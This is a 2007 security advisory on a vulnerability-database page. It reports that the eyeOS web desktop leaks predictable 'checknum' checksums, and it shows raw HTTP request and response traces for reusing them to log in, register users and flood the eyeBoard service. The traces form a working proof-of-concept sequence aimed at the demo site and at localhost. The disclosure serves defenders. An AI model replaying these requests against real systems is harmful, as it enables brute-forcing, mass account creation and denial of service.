Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17908
HistoryAug 28, 2007 - 12:00 a.m.

eyeOS checksum prediction

2007-08-2800:00:00
vulners.com
26
JSON

Subject: eyeOS checksum prediction
Author: Andrej Komarov ([email protected])

eyeOS operates with special intermediate checksums in plaintext. Without its validation it is impossible to make new actions (to login, start new services). There is way to predict eyeOS checksum. If it is automated from hackers side, it will make local Denial Of Service atack or user password stealing.

  1. GET / HTTP/1.1
    >>>>>>> <body onload='sendMsg("758474843719")

  2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
    >>>>>>> HTTP/1.1 200 OK
    Date: Mon, 27 Aug 2007 18:58:21 GMT
    Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Keep-Alive: timeout=10, max=10
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/xml

21db
<?xml version="1.0" encoding="UTF-8"?>
<eyeMessage>
<action>
<task>createWidget</task>
<position>
<x>0</x>
<y>0</y>
<horiz>0</horiz>
<vert>0</vert>
</position>
<checknum>876029936871</checknum> (!)
<name>47631_wnd1</name>
<father>eyeApps</father>

… widgets generation

POST /index.php?checknum=876029936871&msg=doLogin HTTP/1.1 (!)
Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 117
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3Edemo23%3C%2FeyeLogin_Password%3E

POST /index.php?checknum=876029936871&msg=successLogin HTTP/1.1
Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 7
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache

>>> <checknum>749058867402</checknum>

POST /index.php?checknum=432461038814&msg=Launch HTTP/1.1

POST /index.php?checknum=432461038814&msg=App_Clicked HTTP/1.1

On this method is based possible atacks:

  • mass user registration
  • bruteforce atacks
  • flood atacks on eyeBoard service like:

POST /index.php?checknum=PREDICTID_checksum&msg=addMsg HTTP/1.1
params=%3Capp%3EeyeBoard%3C%2Fapp%3E
with additional values : params=%3CMessageB%3EYOUR_MESSAGE%3C%2FMessageB%3E

POST /index.php?checknum=326420826018&msg=doCreateUser HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://127.0.0.1:8080/
Content-Length: 161
Cookie: PHPSESSID=r9vivth7896gtbaj6bst0nlen7
Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_newUser%3ESHALOMA%3C%2FeyeLogin_newUser%3E%3CeyeLogin_Pass1%3Eshaloma%3C%2FeyeLogin_Pass1%3E%3CeyeLogin_Pass2%3Eshaloma%3C%2FeyeLogin_Pass2%3E

POST /index.php?checknum=284626275746&msg=doLogin HTTP/1.1
Accept: /
Accept-Language: ru
Referer: http://127.0.0.1:8080/index.php
Content-Type: application/x-www-form-urlencoded;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)
Host: 127.0.0.1:8080
Content-Length: 105
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=sa3erabjgpcqnfn4k8eutgark0

params=%3CeyeLogin_Username%3E%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3E%3C%2FeyeLogin_Password%3E

JSON